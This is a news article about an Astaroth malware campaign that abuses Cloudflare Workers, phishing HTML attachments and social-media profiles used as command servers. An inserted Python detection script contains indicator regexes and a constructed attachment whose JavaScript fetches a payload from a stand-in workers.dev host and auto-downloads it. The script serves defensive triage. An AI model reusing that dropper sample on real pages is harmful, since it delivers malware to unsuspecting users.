
Criminals use the Cloudflare Workers platform to bypass antiviruses and distribute Astaroth malware

In a recent malware campaign, criminals distributed a new version of the Astaroth malware. To evade detection by antivirus software, the attackers use the Cloudflare Workers platform.

Cloudflare Workers is a platform for running scripts on Cloudflare's servers, which are located in data centers in 90 countries and 193 cities. It allows arbitrary JavaScript code to run without the operator having to maintain any infrastructure of their own.

In this campaign, Cloudflare Workers serves as one stage of the attack chain. The attackers send a phishing email disguised as an ordinary survey, with an HTML file attached.

“This is not a simple HTML file with external links to malware. It’s carefully crafted and contains obfuscated JavaScript code”, reports Marcel Afrahim from Endpoint Security and Malware Research.

The attachment contains obfuscated JavaScript code that contacts a domain hosted on Cloudflare infrastructure. This domain delivers several kinds of malicious payload in JSON format, and because the content is served dynamically, the criminals can swap out the malicious files quickly to avoid blocking.


In the second stage of the attack, the script retrieves the JSON from the URL, decodes the Base64 content into a byte array, and gives the resulting file a name matching that of the HTML attachment. It then generates a download link and triggers it automatically, so the malware is saved to the user’s computer.
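The stage-two chain just described (remote JSON, Base64 decode into a byte array, generated download link) leaves a recognisable footprint in the attachment's script code, so a defender can triage suspicious HTML attachments statically before anyone opens them. The script below is an added example for this page, not code from the article or from the researchers it quotes. It assumes that the default `*.workers.dev` hostname is a useful Cloudflare Workers indicator (the article does not name the domain involved), and both sample attachments it scans are constructed for the demonstration.

```python
"""Static triage of an HTML e-mail attachment for the delivery chain the article
describes: script code fetches JSON from a remote host, Base64-decodes it into a
byte array, and generates a download link for the resulting file.

Added example, not the article's or any researcher's code. Assumptions: the
default *.workers.dev hostname is treated as a Cloudflare Workers indicator (the
article names no domain), and both sample attachments are constructed.
"""
from __future__ import annotations

import re
from dataclasses import dataclass

# Heuristic indicators. None is malicious on its own; the triage looks for the
# combination that makes up the second stage described in the article.
INDICATORS = {
    "remote_json_fetch": re.compile(r"\b(?:fetch|XMLHttpRequest|getJSON)\s*\(", re.I),
    "base64_decode": re.compile(r"\batob\s*\(", re.I),
    "byte_array_build": re.compile(r"\b(?:Uint8Array|ArrayBuffer|Blob)\s*\(", re.I),
    "download_link": re.compile(r"createObjectURL\s*\(|\bdownload\s*=", re.I),
    "auto_click": re.compile(r"\.click\s*\(\s*\)", re.I),
    "filename_from_location": re.compile(r"\blocation\.(?:pathname|href)\b", re.I),
}
# The four indicators that together reproduce the article's stage-two chain.
CORE_CHAIN = {"remote_json_fetch", "base64_decode", "byte_array_build", "download_link"}
URL_RX = re.compile(r'https?://[^\s"\'<>]+', re.I)
# Assumption: the default Workers domain; the article does not name the real one.
WORKERS_RX = re.compile(r"https?://(?:[a-z0-9-]+\.)*workers\.dev(?:[/?#]|$)", re.I)


@dataclass
class TriageResult:
    indicators: list[str]   # indicator names found in the script code
    urls: list[str]         # every http(s) URL referenced by the scripts
    workers_urls: list[str] # subset hosted on the assumed Workers domain
    suspicious: bool        # True when the full stage-two chain is present


def extract_scripts(html: str) -> list[str]:
    """Return the bodies of all inline <script> elements."""
    return [m.group(1) for m in
            re.finditer(r"<script\b[^>]*>(.*?)</script>", html, re.I | re.S)]


def unescape_js_strings(js: str) -> str:
    """Resolve JavaScript hex (backslash-x) and unicode (backslash-u) escapes,
    a cheap way to see through string-level obfuscation of names like "data"."""
    js = re.sub(r"\\x([0-9a-fA-F]{2})", lambda m: chr(int(m.group(1), 16)), js)
    return re.sub(r"\\u([0-9a-fA-F]{4})", lambda m: chr(int(m.group(1), 16)), js)


def triage(html: str) -> TriageResult:
    """Score one HTML attachment; suspicious only if the whole chain is present."""
    code = unescape_js_strings("\n".join(extract_scripts(html)))
    hits = [name for name, rx in INDICATORS.items() if rx.search(code)]
    urls = sorted(set(URL_RX.findall(code)))
    workers = [u for u in urls if WORKERS_RX.match(u)]
    return TriageResult(hits, urls, workers, CORE_CHAIN.issubset(hits))


# Constructed sample 1: mirrors the attachment behaviour the article describes.
MALICIOUS_SAMPLE = r"""<html><body><p>Please complete our short survey.</p>
<script>
var u = "https://survey-example.workers.dev/payload.json";
fetch(u).then(function (r) { return r.json(); }).then(function (j) {
  var s = atob(j["\x64\x61\x74\x61"]);
  var a = new Uint8Array(s.length);
  for (var i = 0; i < s.length; i++) { a[i] = s.charCodeAt(i); }
  var l = document.createElement("a");
  l.href = URL.createObjectURL(new Blob([a]));
  l.download = location.pathname.split("/").pop().replace(".html", ".zip");
  document.body.appendChild(l); l.click();
});
</script></body></html>"""

# Constructed sample 2: a harmless survey page that also fetches JSON.
BENIGN_SAMPLE = """<html><body><h1>Customer survey</h1><div id="q"></div>
<script>
fetch("https://survey.example.com/questions.json").then(function (r) { return r.json(); })
  .then(function (j) { document.getElementById("q").textContent = j.question; });
</script></body></html>"""

if __name__ == "__main__":
    for label, sample in (("constructed malicious", MALICIOUS_SAMPLE),
                          ("constructed benign", BENIGN_SAMPLE)):
        r = triage(sample)
        print(f"{label}: suspicious={r.suspicious} indicators={r.indicators} "
              f"workers={r.workers_urls}")
```

Requiring the whole chain rather than any single indicator keeps ordinary survey pages, which legitimately fetch JSON, out of the alert queue; the benign sample trips only `remote_json_fetch`. Run over a mail gateway's quarantined HTML attachments, the `workers_urls` list also gives you the hostnames to pivot on when hunting for related deliveries.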

In the third stage, the malicious DLL is loaded. It takes its instructions from attacker-controlled YouTube and Facebook accounts, which in this case play the role of the C&C server.

“According to analysis of the samples involved, after the DLL side loading, one of the Diebold Warsaw installation binaries, which is a security suite used on systems accessing online banking in Brazil, is hollowed and used to communicate to Facebook and YouTube profiles in order to obtain the Final C2 addresses”, reported Renato Marinho of Morphus Labs.

The threat actors currently behind the Astaroth campaign are going to great lengths to escape detection and fool conventional security solutions.

Security researchers first reported the spread of the Astaroth malware last month, but since then the attackers have adopted new and increasingly innovative techniques to avoid detection and hide their traces in infected organizations.

About Lyubov Samoilova